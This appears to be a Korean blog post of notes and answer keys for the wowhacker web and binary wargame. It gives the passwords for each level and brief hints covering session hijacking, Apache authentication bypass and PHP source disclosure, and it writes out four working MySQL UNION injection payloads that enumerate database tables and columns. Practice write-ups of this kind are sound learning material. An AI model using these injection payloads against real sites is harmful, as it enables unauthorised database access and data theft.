wowhacker web and binary

2008. 6. 21. 12:25


i love tiger mac  - php 셋팅 문제. 확장자 phps로 주면 소스가 보임
where is fckorea?! - filedownload
iwantknowmoreMrjones! - unix_timestamp() 를 이용 unixtimestamp 형식으로 바꾼후 md5 해쉬값으로
                                     파일 다운로드
level4:VeRY Good! My Friend!    admin 세션 하이재킹, 공지 쓴 시간 추측 , 세션 생성 패턴, md5 해쉬

level5: ISayDDaeYouSayMireoyo! 아파치 웹서버 인증 우회. get put  이외에 options put 등의 메소드를 활용

level6: IhateCrazyCow.too! 자바스크립트 디코딩 인코딩  http://scriptasylum.com/tutorials/encdec/encode-decode.html

level7 : If you dream it, you can do it  mysql 인젝션 limit 쿼리문 사용

Admin 'union Select Table_Name,Table_Name,Table_Name,Table_Name,Table_Name,Table_Name From Information_Schema.Tables Limit 18,1# keytable
Admin 'union Select Table_Name,Table_Name,Table_Name,Table_Name,Table_Name,Table_Name From Information_Schema.Tables Limit 19,1# user_info

admin' union SELECT column_name,column_name,column_name,column_name,column_name,column_name FROM information_schema.columns WHERE table_name='user_info' limit 2,1#

admin' union SELECT column_name,column_name,column_name,column_name,column_name,column_name FROM information_schema.columns WHERE table_name='keytable' limit 1,1#


binary

level1 : D0n7 sm0k1ng!!

badcob War game

티스토리툴바